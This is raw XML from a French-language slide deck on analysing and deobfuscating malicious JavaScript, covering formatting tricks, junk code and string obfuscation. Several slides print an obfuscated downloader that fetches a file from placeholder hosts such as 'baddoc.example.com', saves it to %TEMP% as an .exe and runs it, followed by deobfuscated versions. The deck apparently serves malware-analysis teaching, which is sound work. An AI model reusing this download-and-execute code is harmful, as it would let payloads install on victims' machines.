                </a:solidFill>
              </a:rPr>
              <a:t>nasmm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasdi.ExpandEnvironmentStrings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(« 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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TE MP%")+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(92)+"107"; </a:t>
            </a:r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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>naddk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=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 ("MSXML2.XMLHTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ltX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=13802;var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WScript.CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADODB.Stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");var y7tdu=64936;var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = 0</a:t>
            </a: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for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(var nasd8 =ld;nasd8&lt;nasdj.length;nasd8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>naddk.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("G"+"E"+"T","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"+""+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasdj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[nasd8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]+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"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cou"+""+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/?id ="+nasd8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+« &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=711791"+n, false);var Nkz2x=25991; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>naddk.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JRQE2=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25337;if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naddk.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>== (100+200-100)){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasbv.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EcZUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=76990;nasbv.saveToFile(nasmm+nasd8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+".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exe",2);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasdi.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(nasmm+nasd8+".e xe",1,0);}}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9040" y="356716"/>
            <a:ext cx="465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JAVASCRIPT OBFUSQUE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706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2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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>etranger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4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étranger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Obscurcissement des</a:t>
            </a:r>
          </a:p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Baddoc.doc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Ancien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format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Crée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2015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Origine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russe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probable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hit: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VBA macro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26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étranger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Obscurcissement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>des</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>données</a:t>
            </a:r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30709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Substitution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726477" y="3081496"/>
            <a:ext cx="4446739" cy="172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2167003" y="3081496"/>
            <a:ext cx="3089389" cy="172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465" y="1753644"/>
            <a:ext cx="793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Modifier le formatage du code pour le rendre difficile a lire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97" y="3081496"/>
            <a:ext cx="29225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ab=“123”;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for(i=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; i&lt;100; i++) {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ab[0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] = ab[0] ^ i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>print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i;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6997" y="3356975"/>
            <a:ext cx="395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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ab=“123”;for(i=0;i&lt;100;i++){ </a:t>
            </a:r>
            <a:endParaRPr lang="nn-NO" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ab[0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]=ab[0]^i;print i;} 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5256392" y="3866326"/>
            <a:ext cx="134291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38032" y="5815797"/>
            <a:ext cx="863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programmes d’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>embelissement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t> de code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>beautification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6940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382" y="2063102"/>
            <a:ext cx="11010378" cy="30162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99b99a99d99d99e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99r99.99e99x99a99m99p99l99e99.99c99o99m99« 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");var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NrkQD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=38105;var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= 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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");var ahu2=“3”;var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(« </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%TE 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(92)+"107";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8o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ltX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=13802;var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");var y7tdu=64936;var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 =ld;nasd8&lt;nasdj.length;nasd8++){</a:t>
            </a:r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 ="+nasd8+« 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false);var Nkz2x=25991; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1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();var JRQE2=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>25337;if 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 (100+200-100)){ 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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EcZUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=76990;nasbv.saveToFile(nasmm+nasd8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+".exe",2);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 xe",1,0);}}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>				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954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082" y="634352"/>
            <a:ext cx="11010378" cy="560153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NrkQD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=38105;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ahu2=“3”; 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8oltX=13802;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y7tdu=64936;var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var Nkz2x=25991;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var JRQE2=25337;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if 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var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EcZUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=76990;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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasbv.saveToFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(nasmm+nasd8+".exe",2);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sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>				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002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726477" y="2604152"/>
            <a:ext cx="4446739" cy="2756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1215025" y="3081496"/>
            <a:ext cx="4041367" cy="172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etranger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465" y="175364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Rajout de lignes de code pour induire en erreur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34688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var num1 = 10;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num2 = 5;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num3 = num1 + num2</a:t>
            </a:r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5397" y="2825951"/>
            <a:ext cx="34688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= 10+10;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num1 = 10;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b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= “12ma34”;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num2 = 5;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c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= b.length();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var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>num3 = num1 + num2;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5256392" y="3866326"/>
            <a:ext cx="134291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38032" y="5815797"/>
            <a:ext cx="8307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chercher le variables et le code utilisés une seule fois</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>t les retirer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8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55" y="482474"/>
            <a:ext cx="11010378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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NrkQD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=38105;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ahu2=“3”; </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B05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8oltX=13802;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var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y7tdu=64936;</a:t>
            </a:r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>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var Nkz2x=25991;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>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var JRQE2=25337;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if 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>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EcZUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=76990;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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasbv.saveToFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(nasmm+nasd8+".exe",2);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2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55" y="482474"/>
            <a:ext cx="11010378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556155" y="1105319"/>
            <a:ext cx="1363080" cy="22106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5325626" y="1457011"/>
            <a:ext cx="1165609" cy="33159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0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956142" y="4384110"/>
            <a:ext cx="6939420" cy="1014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4775189" y="2620946"/>
            <a:ext cx="2641621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Obscurcissement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>donnees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465" y="1753644"/>
            <a:ext cx="737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Utiliser des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>operations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour rendre les données </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ilisibles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251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032" y="5815797"/>
            <a:ext cx="596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remplacer avec des donnés lisibles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5189" y="2620946"/>
            <a:ext cx="2641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file = “fun.exe”;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var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = 100;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591" y="4487696"/>
            <a:ext cx="6918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file = “f”+””+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(0x70+5)+”n”; </a:t>
            </a:r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var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = 500*0+100*(1-0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/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1">
            <a:off x="6095999" y="3451943"/>
            <a:ext cx="1" cy="844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434340"/>
            <a:ext cx="11086473" cy="60453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="b99a99d99.99e99x99a99m99p99l99e99299.99c99o99m99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99b99a99d99d99e99r99.99e99x99a99m99p99l99e99.99c99o99m99".replace(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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(92)+"107«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("G"+"E"+"T","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"+""+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF000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[nasd8]+"/cou"+""+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/?id="+nasd8+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==(100+200-100)){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8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00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="b99a99d99.99e99x99a99m99p99l99e99299.99c99o99m99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99b99a99d99d99e99r99.99e99x99a99m99p99l99e99.99c99o99m99".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(92)+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>G"+"E"+"T","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"+""+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cou"+""+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100+200-100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Analyse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 JAVASCRIPT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0714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00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="b99a99d99.99e99x99a99m99p99l99e99299.99c99o99m99 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99b99a99d99d99e99r99.99e99x99a99m99p99l99e99.99c99o99m99".</a:t>
            </a:r>
            <a:r>
